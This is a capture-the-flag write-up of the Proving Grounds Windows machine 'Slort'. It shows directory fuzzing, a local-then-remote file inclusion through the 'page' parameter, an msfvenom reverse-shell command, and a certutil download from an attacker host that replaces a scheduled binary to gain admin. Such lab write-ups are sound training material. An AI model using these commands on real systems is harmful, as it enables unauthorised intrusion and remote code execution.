Slort

Source: Proving Grounds OS: Windows Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started as usual with autorecon which exposed: FTP (21), 135, 139, 445, 3306, HTTP (4443), 5040, HTTP (8080), 49664 -> 49669

Service Analysis

  • FTP had no anonymous access so I started with the usual, HTTP. Both HTTP sites were XAMPP’s default page. Access to phpMyAdmin was denied, displaying the message:

XAMPP Default Page
Access Forbidden

  • I checked the fuzzers but they exposed nothing, and neither SMB nor MySQL provided anything useful. I kept going in circles for a bit until I fuzzed the sites again with a different wordlist:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.213.53:4443:/FUZZ

  • That’s when "/site/" was exposed. This directory contained a simple PHP page with the URL: http://192.168.213.53:4443/site/index.php?page=main.php I’m sure if I were in an anime, a light bulb would have appeared with the text "File Inclusion" flashing before my eyes.

site Directory

Gaining Initial Access

  • I tested the inclusion by visiting: http://192.168.213.53:4443/site/index.php?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts which worked!

LFI Check

  • When facing a file inclusion vulnerability, it’s important to check whether it’s Remote File Inclusion (RFI) or only Local File Inclusion. Turns out we have RFI and that was it, we were able to get a shell!

  • I generated a reverse shell payload with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178

  • Then triggered it via the vulnerable parameter: http://192.168.213.53:4443/site/index.php?page=http://192.168.45.170:901/shell.php

Reverse Shell

Privilege Escalation

  • Once I was in, I uploaded winPEAS and started checking around. The C drive had a Backup directory, and inside I found a file, info.txt, containing:

info.txt Content

  • This indicated a scheduled service (the Windows equivalent of cron jobs). I decided to see if I had permission over the directory. I performed the following steps:

move TFTP.EXE TFTP_old.EXE
certutil -urlcache -split -f http://192.168.45.170:901/shell.exe
move shell.exe TFTP.EXE

  • There we go, we got a shell back as an admin.

Privilege Escalation

Lessons Learned

  • Fuzzing with alternative wordlists can reveal hidden directories when initial scans turn up nothing.

  • File inclusion vulnerabilities can sometimes allow Remote File Inclusion, granting a quick path to a shell.

  • Scheduled tasks or services that run binaries from writable directories are valuable privilege escalation vectors.

PreviousNickelNextMedJed

Last updated